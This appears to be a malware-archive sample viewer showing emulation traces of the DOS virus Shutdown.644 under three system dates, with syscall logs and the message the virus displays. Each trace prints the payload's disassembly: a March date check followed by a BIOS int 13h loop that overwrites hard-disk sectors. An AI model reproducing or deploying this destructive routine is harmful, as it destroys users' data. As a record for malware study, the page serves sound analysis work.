Sample viewer

vx.netlux.org/Virus.DOS.Shutdown.644

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:51:42.618048681Z 42 PC: 12ad2 | Get date 0x12ad2: cmp dh, 3
0x12ad5: jne 0x12b18
0x12ad7: mov dx, 0x109
0x12ada: mov ah, 9
0x12adc: int 0x21
0x12ade: xor ax, ax
0x12ae0: int 0x13
0x12ae2: mov ax, 0x309
0x12ae5: mov cx, 0x101
0x12ae8: mov dx, 0x80
0x12aeb: int 0x13
0x12aed: inc dh
0x12aef: cmp dh, 5
0x12af2: jne 0x12aeb
0x12af4: inc dl
0x12af6: xor dh, dh
0x12af8: jmp 0x12aeb
0x12afa: push cs
0x12afb: pop ds
0x12afc: mov ax, 0x384
2018-12-17T22:51:42.621919542Z 25 PC: 12b1c | Get default drive
2018-12-17T22:51:42.624369956Z 76 PC: 12a44 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":10650,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:28:43.145728398Z 42 PC: 12ad2 | Get date 0x12ad2: cmp dh, 3
0x12ad5: jne 0x12b18
0x12ad7: mov dx, 0x109
0x12ada: mov ah, 9
0x12adc: int 0x21
0x12ade: xor ax, ax
0x12ae0: int 0x13
0x12ae2: mov ax, 0x309
0x12ae5: mov cx, 0x101
0x12ae8: mov dx, 0x80
0x12aeb: int 0x13
0x12aed: inc dh
0x12aef: cmp dh, 5
0x12af2: jne 0x12aeb
0x12af4: inc dl
0x12af6: xor dh, dh
0x12af8: jmp 0x12aeb
0x12afa: push cs
0x12afb: pop ds
0x12afc: mov ax, 0x384
2018-12-25T12:28:43.148503037Z 25 PC: 12b1c | Get default drive
2018-12-25T12:28:43.151449205Z 76 PC: 12a44 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":3,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":10650,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T13:07:14.332185903Z 42 PC: 12ad2 | Get date 0x12ad2: cmp dh, 3
0x12ad5: jne 0x12b18
0x12ad7: mov dx, 0x109
0x12ada: mov ah, 9
0x12adc: int 0x21
0x12ade: xor ax, ax
0x12ae0: int 0x13
0x12ae2: mov ax, 0x309
0x12ae5: mov cx, 0x101
0x12ae8: mov dx, 0x80
0x12aeb: int 0x13
0x12aed: inc dh
0x12aef: cmp dh, 5
0x12af2: jne 0x12aeb
0x12af4: inc dl
0x12af6: xor dh, dh
0x12af8: jmp 0x12aeb
0x12afa: push cs
0x12afb: pop ds
0x12afc: mov ax, 0x384
2018-12-25T13:07:14.334781422Z 9 PC: 12ade | Display string (String= ' Computers must be shutdown to dedicate my sister!')